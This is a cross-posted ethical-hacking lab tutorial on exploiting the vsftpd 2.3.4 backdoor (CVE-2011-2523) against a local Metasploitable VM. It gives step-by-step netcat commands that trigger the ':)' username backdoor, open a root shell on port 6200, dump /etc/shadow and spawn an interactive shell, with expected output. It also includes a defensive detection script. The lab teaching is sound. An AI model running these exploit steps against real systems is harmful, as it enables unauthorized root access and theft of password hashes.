Mr Elite

Posted on • Originally published at securityelites.com

Metasploitable vsftpd Backdoor Lab — CVE-2011-2523 Exploit Guide

📰 Originally published on Securityelites — AI Red Team Education — the canonical, fully-updated version of this article.


🧪 Part of the Metasploitable Lab Series (free)

Lab 5 of 30 · 16% complete

⚠️ Lab Environment Only. Metasploitable vsftpd Backdoor Lab – vsftpd 2.3.4 exploitation targets your local Metasploitable 2 VM only. Never test against systems you don't own.

✅ Before You Start

  • Lab 4 — First Metasploit Module — running your first MSF exploit. This lab introduces the vsftpd backdoor — one of the most famous Metasploitable vulnerabilities and the classic first manually exploitable service.
  • Metasploitable 2 VM running · Kali Linux · nmap · netcat · msfconsole installed · Both VMs on the same host-only network segment

The vsftpd 2.3.4 backdoor is the vulnerability that appears in almost every beginner Metasploitable walkthrough, and for good reason. I use it in every introductory lab because it demonstrates three distinct security concepts simultaneously: supply chain attack mechanics, triggered backdoor behaviour, and non-standard port exploitation patterns. It is one of the clearest examples of a supply chain attack in open-source software history: in 2011 an attacker compromised the vsftpd project's source code distribution server and inserted a backdoor that opens a root shell on port 6200 whenever a username containing a smiley face ":)" is submitted. Understanding this vulnerability therefore teaches how supply chain attacks work, how a triggered backdoor differs from a direct service exploit, and how to identify and exploit non-standard ports opened by malware.

🎯 Lab 5 Objectives

  • Identify vsftpd 2.3.4 on Metasploitable via Nmap version detection
  • Understand the backdoor trigger mechanism (smiley face username)
  • Exploit manually using netcat — no Metasploit needed
  • Exploit via Metasploit module for comparison
  • Verify root access and document the finding

⏱️ 25 min · 3 terminal exercises

📋 Hacking Lab 35 — Metasploitable vsftpd Backdoor Lab

  1. Vulnerability Background — CVE-2011-2523
  2. Detection — Nmap and Banner Grabbing
  3. Manual Exploitation via Netcat
  4. Metasploit Module Exploitation
  5. Post-Exploitation and Remediation

The vsftpd backdoor is a classic example of a supply chain attack. The full Metasploitable lab series continues with Lab 6 — Samba exploitation. Check open ports first with the Port Scanner Tool.

Vulnerability Background — CVE-2011-2523

In June 2011, the vsftpd 2.3.4 source code package distributed from the project's official site was compromised. An attacker had replaced the legitimate source archive with a version containing a backdoor. The backdoor works as follows: when a user logs in with a username ending in the string ":)" (a smiley face), vsftpd opens a bind shell on port 6200 with root privileges. The user never needs to authenticate; triggering the backdoor only requires connecting to port 21 and sending the poisoned username. The legitimate vsftpd 2.3.4 had no such code; only the trojaned package distributed for a period from the official download server contained the backdoor.

THE BACKDOOR CODE (SIMPLIFIED)

What the backdoor does (conceptually)

    if username.endswith(":)"):          # smiley face trigger
        bind_port = 6200                 # open listener on 6200
        spawn_shell("/bin/sh", uid=0)    # root shell, no auth required

Attack flow

  1. Attacker connects to port 21 (FTP)
  2. Sends: USER anything:)  ← smiley triggers backdoor
  3. vsftpd opens port 6200 with root shell
  4. Attacker connects to port 6200 → root shell, no password

Why it’s significant

Supply chain attack: legitimate software distribution channel poisoned
No authentication required: trigger + connect = root
Invisible to most AV: installed as part of a "legitimate" software package

Detection — Nmap and Banner Grabbing

EXERCISE 1 — DETECT vsftpd 2.3.4

Step 1: Confirm FTP service version

nmap -sV -p 21 192.168.56.101

Expected output:

21/tcp open ftp vsftpd 2.3.4
Service Info: Unix

Step 2: Run NSE script — confirms backdoor explicitly

nmap --script ftp-vsftpd-backdoor -p 21 192.168.56.101

Expected output:

| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2011-2523
|_ Backdoor listening on port 6200/tcp

Step 3: Banner grab with netcat

nc 192.168.56.101 21

Expected: 220 (vsFTPd 2.3.4)

Step 4: Searchsploit

searchsploit vsftpd 2.3.4

Shows: Unix/Remote vsftpd 2.3.4 – Backdoor Command Execution

My Approach — Why I Banner Grab Before Running NSE: I always manually netcat to port 21 before running the NSE script. If the banner shows "220 (vsFTPd 2.3.4)" I already know it's vulnerable — the NSE script just confirms it formally for the report. My workflow: banner grab first (10 seconds), searchsploit confirm (10 seconds), then exploit. I've found that automated scripts sometimes fail on rate-limited services where manual netcat always works.
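From the defender's side, here is an added example (not from the original post and not vsftpd project code) that turns the indicators above into a check: it scans a constructed FTP control-channel transcript for the 2.3.4 banner and for a USER name carrying the ":)" trigger, and scans constructed `ss`-style socket output for a listener on the backdoor port 6200. The transcript, the listener lines and the function names are all assumptions constructed for this example.

```python
import re
from typing import List, Tuple

# Constructed FTP control-channel transcript mirroring the lab session
# (not a real capture): "S>" = server line, "C>" = client line.
SAMPLE_SESSION = """\
S> 220 (vsFTPd 2.3.4)
C> USER backdoor:)
S> 331 Please specify the password.
C> PASS anything
"""

# Constructed `ss -ltn`-style output from the victim after the trigger.
SAMPLE_LISTENERS = """\
LISTEN 0 32  0.0.0.0:21    0.0.0.0:*
LISTEN 0 1   0.0.0.0:6200  0.0.0.0:*
"""

BANNER_RE = re.compile(r"^220 \(vsFTPd (\d+(?:\.\d+)*)\)")
USER_RE = re.compile(r"^USER (.*)$")
TRIGGER = ":)"              # CVE-2011-2523 trigger: bytes 0x3a 0x29 in the username
BACKDOOR_PORT = 6200        # port the trojaned build opens a root shell on
SUSPECT_VERSION = "2.3.4"   # trojaned release; a clean 2.3.4 build is not affected

def analyse_session(transcript: str) -> List[Tuple[str, str]]:
    """Return (kind, detail) findings for an FTP control-channel transcript."""
    findings = []
    for line in transcript.splitlines():
        if line.startswith("S> "):
            m = BANNER_RE.match(line[3:])
            if m and m.group(1) == SUSPECT_VERSION:
                findings.append(("banner", f"vsftpd {m.group(1)} banner; verify the package source"))
        elif line.startswith("C> "):
            m = USER_RE.match(line[3:])
            if m and TRIGGER in m.group(1):
                findings.append(("trigger", f"USER {m.group(1)!r} contains {TRIGGER!r}: trigger attempt"))
    return findings

def backdoor_listeners(ss_output: str) -> List[str]:
    """Return local addresses in LISTEN state bound to the backdoor port."""
    hits = []
    for line in ss_output.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[0] == "LISTEN":
            local = parts[3]                       # e.g. 0.0.0.0:6200
            if local.rsplit(":", 1)[-1] == str(BACKDOOR_PORT):
                hits.append(local)
    return hits
```

A banner hit alone is only a hint, since a clean 2.3.4 build reports the same string; the trigger in a USER command or a listener on 6200 is the stronger signal.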

Manual Exploitation via Netcat

The manual exploit requires only netcat — no frameworks. This is the technique that demonstrates understanding of what the vulnerability actually does, rather than just running a module blindly.

EXERCISE 2 — MANUAL EXPLOIT WITH NETCAT

Terminal 1: Trigger the backdoor via FTP

nc 192.168.56.101 21

You see: 220 (vsFTPd 2.3.4)

USER backdoor:)

Response: 331 Please specify the password.

PASS anything

Port 6200 now open — backdoor triggered

Terminal 2: Connect to the backdoor shell

nc 192.168.56.101 6200

Blank line = shell waiting for commands

id

Expected: uid=0(root) gid=0(root)

hostname

Expected: metasploitable

cat /etc/shadow | head -3

Expected: root password hash — full root access confirmed

Upgrade to interactive shell

python -c 'import pty; pty.spawn("/bin/bash")'
root@metasploitable:/#


Terminal 1 — Trigger (Port 21) | Terminal 2 — Shell (Port 6200)

TERMINAL 1 — FTP Trigger
$ nc 192.168.56.101 21
220 (vsFTPd 2.3.4)
USER backdoor:)
331 Please specify the password.
PASS anything
[hangs — backdoor triggered]

TERMINAL 2 — Root Shell
$ nc 192.168.56.101 6200
id
uid=0(root) gid=0(root)
hostname
metasploitable
cat /etc/shadow | head -2
root:$1$bku4…  ← hash



This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit Securityelites — AI Red Team Education.
